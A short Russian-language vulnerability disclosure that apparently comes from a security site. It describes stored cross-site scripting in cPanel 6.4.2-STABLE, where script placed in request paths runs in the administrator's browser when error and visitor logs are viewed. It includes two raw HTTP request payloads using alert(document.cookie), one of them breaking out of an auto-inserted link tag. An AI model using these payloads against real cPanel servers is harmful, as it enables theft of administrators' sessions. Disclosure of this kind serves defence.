В запросы, остающиеся в логах cpanel, можно внедрить код, который будет отображен (выполнен) в броузере администратора при просмотре им логов. Пример лога: 

[из errlog.html]

<b>Last 300 Error Log Messages in reverse order:</b><hr>
<pre>
[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
/home/dir/public_html/foobar.html
</pre>
… 

Т.о. можно дать что-то типа следующего: 

GET /<script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com 

Для «Latest visitors» лога тестированной версии (6.4.2-STABLE) нужно предварительно закрыть тег <a>, который автоматом ставится для гиперссылок:

GET /»></a><script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com



Оставить мнение